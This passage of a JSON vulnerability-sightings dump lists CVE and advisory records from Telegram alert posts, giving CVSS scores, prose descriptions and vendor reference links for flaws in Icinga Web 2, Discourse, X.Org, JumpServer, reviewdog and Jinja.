https://access.redhat.com/security/cve/CVE-2024-1725\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2265398", "creation_timestamp": "2025-03-26T05:24:41.000000Z"}, {"uuid": "16af4c68-b168-4369-8103-9755721bf06e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8678", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8819", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-26T09:59:51.092Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-26T10:25:16.000000Z"}, {"uuid": "3814557b-51f6-462b-9433-ecaed5674d31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8847", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8819", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-26T09:59:51.092Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-26T10:25:16.000000Z"}, {"uuid": "458b16de-e252-45c4-8053-7bbfa3134d1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8327", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8819", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-03-26T09:59:51.092Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/errata/RHSA-2025:2416\n9. https://access.redhat.com/security/cve/CVE-2024-9355\n10. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-03-26T10:25:16.000000Z"}, {"uuid": "6b9ec8ba-1893-49e0-9b1d-63cc3a94668b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3X37-FJC3-CH8W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8869", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27405\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. A vulnerability in versions prior to 2.11.5 and 2.12.13 allows an attacker to craft a URL that, once visited by any user, allows to embed arbitrary Javascript into Icinga Web and to act on behalf of that user. This issue has been resolved in versions 2.11.5 and 2.12.3 of Icinga Web 2. As a workaround, those who have Icinga Web 2.12.2 may enable a content security policy in the application settings.\n\ud83d\udccf Published: 2025-03-26T15:10:10.288Z\n\ud83d\udccf Modified: 2025-03-26T15:10:10.288Z\n\ud83d\udd17 References:\n1. https://github.com/Icinga/icingaweb2/security/advisories/GHSA-3x37-fjc3-ch8w\n2. https://github.com/Icinga/icingaweb2/releases/tag/v2.11.5\n3. https://github.com/Icinga/icingaweb2/releases/tag/v2.12.3", "creation_timestamp": "2025-03-26T15:26:16.000000Z"}, {"uuid": "8c064ddd-597f-40d3-ae18-d23cc8d0fb04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HFCX-QJW6-573R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8845", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24808\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Discourse is an open-source discussion platform. Prior to versions `3.3.4` on the `stable` branch and `3.4.0.beta5` on the `beta` branch, someone who is about to reach the limit of users in a group DM may send requests to add new users in parallel. The requests might all go through ignoring the limit due to a race condition. The patch in versions `3.3.4` and `3.4.0.beta5` uses the `lock` step in service to wrap part of the `add_users_to_channel` service inside a distributed lock/mutex in order to avoid the race condition.\n\ud83d\udccf Published: 2025-03-26T14:08:38.915Z\n\ud83d\udccf Modified: 2025-03-26T14:14:38.212Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-hfcx-qjw6-573r\n2. https://github.com/discourse/discourse/commit/a16b2f224860f6678f89f5ffa012f0ede17e4095", "creation_timestamp": "2025-03-26T14:25:09.000000Z"}, {"uuid": "8888f024-8daf-4f64-8724-75297abcd418", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4P63-QW6G-4MV2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8843", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24972\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Discourse is an open-source discussion platform. Prior to versions `3.3.4` on the `stable` branch and `3.4.0.beta5` on the `beta` branch, in specific circumstances, users could be added to group direct messages despite disabling direct messaging in their preferences. Versions `3.3.4` and `3.4.0.beta5` contain a patch for the issue. A workaround is available. If a user disables chat in their preferences then they cannot be added to new group chats.\n\ud83d\udccf Published: 2025-03-26T14:15:13.164Z\n\ud83d\udccf Modified: 2025-03-26T14:15:13.164Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse/security/advisories/GHSA-4p63-qw6g-4mv2", "creation_timestamp": "2025-03-26T14:25:07.000000Z"}, {"uuid": "94b38276-9892-4f10-9304-62ddc2d336da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "b0d3d0bc-c553-4010-b433-4c147b201432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9009", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26598\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An out-of-bounds write flaw was found in X.Org and Xwayland. The function GetBarrierDevice() searches for the pointer device based on its device ID and returns the matching value, or supposedly NULL, if no match was found. However, the code will return the last element of the list if no matching device ID is found, which can lead to out-of-bounds memory access.\n\ud83d\udccf Published: 2025-02-25T15:54:57.355Z\n\ud83d\udccf Modified: 2025-03-27T04:20:45.713Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26598\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345254", "creation_timestamp": "2025-03-27T04:25:52.000000Z"}, {"uuid": "ad0be10b-4114-4000-a711-2d0ecbaf0e14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C6PG-H955-WF66", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8870", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27404\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. A vulnerability in versions prior to 2.11.5 and 2.12.13 allows an attacker to craft a URL that, once visited by any user, allows to embed arbitrary Javascript into Icinga Web and to act on behalf of that user. This issue has been resolved in versions 2.11.5 and 2.12.3 of Icinga Web 2. As a workaround, those who have Icinga Web 2.12.2 may enable a content security policy in the application settings.\n\ud83d\udccf Published: 2025-03-26T14:21:05.363Z\n\ud83d\udccf Modified: 2025-03-26T15:10:01.679Z\n\ud83d\udd17 References:\n1. https://github.com/Icinga/icingaweb2/security/advisories/GHSA-c6pg-h955-wf66\n2. https://github.com/Icinga/icingaweb2/releases/tag/v2.11.5\n3. https://github.com/Icinga/icingaweb2/releases/tag/v2.12.3", "creation_timestamp": "2025-03-26T15:26:16.000000Z"}, {"uuid": "3958984d-2e02-44b1-95ba-940636a69cf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5CJW-FWJC-8J38", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8896", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27609\n\ud83d\udd25 CVSS Score: 1.1 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U)\n\ud83d\udd39 Description: Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. A vulnerability in versions prior to 2.11.5 and 2.12.13 allows an attacker to craft a request that, once transmitted to a victim's Icinga Web, allows to embed arbitrary Javascript into it and to act on behalf of that user. This issue has been resolved in versions 2.11.5 and 2.12.3 of Icinga Web 2. As a workaround, those who have Icinga Web 2.12.2 may enable a content security policy in the application settings. Any modern browser with a working CORS implementation also sufficiently guards against the vulnerability.\n\ud83d\udccf Published: 2025-03-26T16:10:19.223Z\n\ud83d\udccf Modified: 2025-03-26T16:10:19.223Z\n\ud83d\udd17 References:\n1. https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5cjw-fwjc-8j38\n2. https://github.com/Icinga/icingaweb2/releases/tag/v2.11.5\n3. https://github.com/Icinga/icingaweb2/releases/tag/v2.12.3", "creation_timestamp": "2025-03-26T16:25:33.000000Z"}, {"uuid": "8ccbefa5-368a-480f-bf62-326a4df94d10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "534addcc-6355-4305-9e05-1fef2fdf35b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "738bcdc4-3fa9-4320-8543-360c9f5cdcaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9010", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26597\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A buffer overflow flaw was found in X.Org and Xwayland. If XkbChangeTypesOfKey() is called with a 0 group, it will resize the key symbols table to 0 but leave the key actions unchanged. If the same function is later called with a non-zero value of groups, this will cause a buffer overflow because the key actions are of the wrong size.\n\ud83d\udccf Published: 2025-02-25T15:54:48.196Z\n\ud83d\udccf Modified: 2025-03-27T04:20:29.448Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26597\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345255", "creation_timestamp": "2025-03-27T04:25:53.000000Z"}, {"uuid": "c35e2414-1962-4c36-8677-d8b3a9142565", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WF5F-4JWR-PPCP", "type": "published-proof-of-concept", "source": "Telegram/g1IPI13McdamF9_s4gJnvYvOCv2XOEDkNjK_8-C2_vZIPKI", "content": "", "creation_timestamp": "2026-01-08T23:06:17.000000Z"}, {"uuid": "2aed6da5-1b4f-428b-86e9-dbf1c1852b35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QRV3-JC3H-F3M6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8689", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30214\n\ud83d\udd25 CVSS Score: 8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Frappe is a full-stack web application framework. Prior to versions 14.89.0 and 15.51.0, making crafted requests could lead to information disclosure that could further lead to account takeover. Versions 14.89.0 and 15.51.0 fix the issue. There's no workaround to fix this without upgrading.\n\ud83d\udccf Published: 2025-03-25T15:05:42.656Z\n\ud83d\udccf Modified: 2025-03-25T15:05:42.656Z\n\ud83d\udd17 References:\n1. https://github.com/frappe/frappe/security/advisories/GHSA-qrv3-jc3h-f3m6", "creation_timestamp": "2025-03-25T15:24:11.000000Z"}, {"uuid": "5172f404-c67d-4c06-ba2d-5ca5e933a7db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RPF7-G4XH-84V9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8767", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-40628\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: JumpServer is an open-source Privileged Access Management (PAM) tool that provides DevOps and IT teams with on-demand and secure access to SSH, RDP, Kubernetes, Database and RemoteApp endpoints through a web browser. An attacker can exploit the ansible playbook to read arbitrary files in the celery container, leading to sensitive information disclosure. The Celery container runs as root and has database access, allowing the attacker to steal all secrets for hosts, create a new JumpServer account with admin privileges, or manipulate the database in other ways. This issue has been addressed in release versions 3.10.12 and 4.0.0. It is recommended to upgrade the safe versions. There is no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2024-07-18T17:05:21.662Z\n\ud83d\udccf Modified: 2025-03-25T19:58:34.928Z\n\ud83d\udd17 References:\n1. https://github.com/jumpserver/jumpserver/security/advisories/GHSA-rpf7-g4xh-84v9\n2. https://www.sonarsource.com/blog/diving-into-jumpserver-attackers-gateway-to-internal-networks-2-2", "creation_timestamp": "2025-03-25T20:24:37.000000Z"}, {"uuid": "7b2a792f-8564-4e71-a782-a3209c7f18ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QMG3-HPQR-GQVC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8569", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30154\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)\n\ud83d\udd39 Description: reviewdog/action-setup is a GitHub action that installs reviewdog. reviewdog/action-setup@v1 was compromised March 11, 2025, between 18:42 and 20:31 UTC, with malicious code added that dumps exposed secrets to Github Actions Workflow Logs. Other reviewdog actions that use `reviewdog/action-setup@v1` that would also be compromised, regardless of version or pinning method, are reviewdog/action-shellcheck, reviewdog/action-composite-template, reviewdog/action-staticcheck, reviewdog/action-ast-grep, and reviewdog/action-typos.\n\ud83d\udccf Published: 2025-03-19T15:15:29.113Z\n\ud83d\udccf Modified: 2025-03-24T22:20:22.752Z\n\ud83d\udd17 References:\n1. https://github.com/reviewdog/reviewdog/security/advisories/GHSA-qmg3-hpqr-gqvc\n2. https://github.com/reviewdog/reviewdog/issues/2079\n3. https://github.com/reviewdog/action-setup/commit/3f401fe1d58fe77e10d665ab713057375e39b887\n4. https://github.com/reviewdog/action-setup/commit/f0d342d24037bb11d26b9bd8496e0808ba32e9ec\n5. https://www.wiz.io/blog/new-github-action-supply-chain-attack-reviewdog-action-setup", "creation_timestamp": "2025-03-24T23:23:29.000000Z"}, {"uuid": "cfd9a574-b4c0-40a4-ba28-b2f1cfd867f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1864", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/8934", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1249\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Keycloak's OIDC component in the \"checkLoginIframe,\" which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.\n\ud83d\udccf Published: 2024-04-17T13:22:48.335Z\n\ud83d\udccf Modified: 2025-03-26T19:24:12.590Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1860\n2. https://access.redhat.com/errata/RHSA-2024:1861\n3. https://access.redhat.com/errata/RHSA-2024:1862\n4. https://access.redhat.com/errata/RHSA-2024:1864\n5. https://access.redhat.com/errata/RHSA-2024:1866\n6. https://access.redhat.com/errata/RHSA-2024:1867\n7. https://access.redhat.com/errata/RHSA-2024:1868\n8. https://access.redhat.com/errata/RHSA-2024:2945\n9. https://access.redhat.com/errata/RHSA-2024:4057\n10. https://access.redhat.com/security/cve/CVE-2024-1249\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2262918", "creation_timestamp": "2025-03-26T19:26:07.000000Z"}, {"uuid": "d13f90f5-b7f2-4211-9dc6-0416aece4638", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3237-QQM7-MFV7", "type": "published-proof-of-concept", "source": "Telegram/cKPc-ot7q59oJlAnZ-7j_vmlHxodzTn6vxzXmtBFpdCfArg", "content": "", "creation_timestamp": "2026-01-08T23:06:31.000000Z"}, {"uuid": "920b979a-7361-47b6-b0bd-11d0cb1c05d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CPWX-VRP4-4PQ7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14211", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27516\n\ud83d\udd25 CVSS Score: 5.4 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Jinja is an extensible templating engine. Prior to 3.1.6, an oversight in how the Jinja sandboxed environment interacts with the |attr filter allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates. Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to use the |attr filter to get 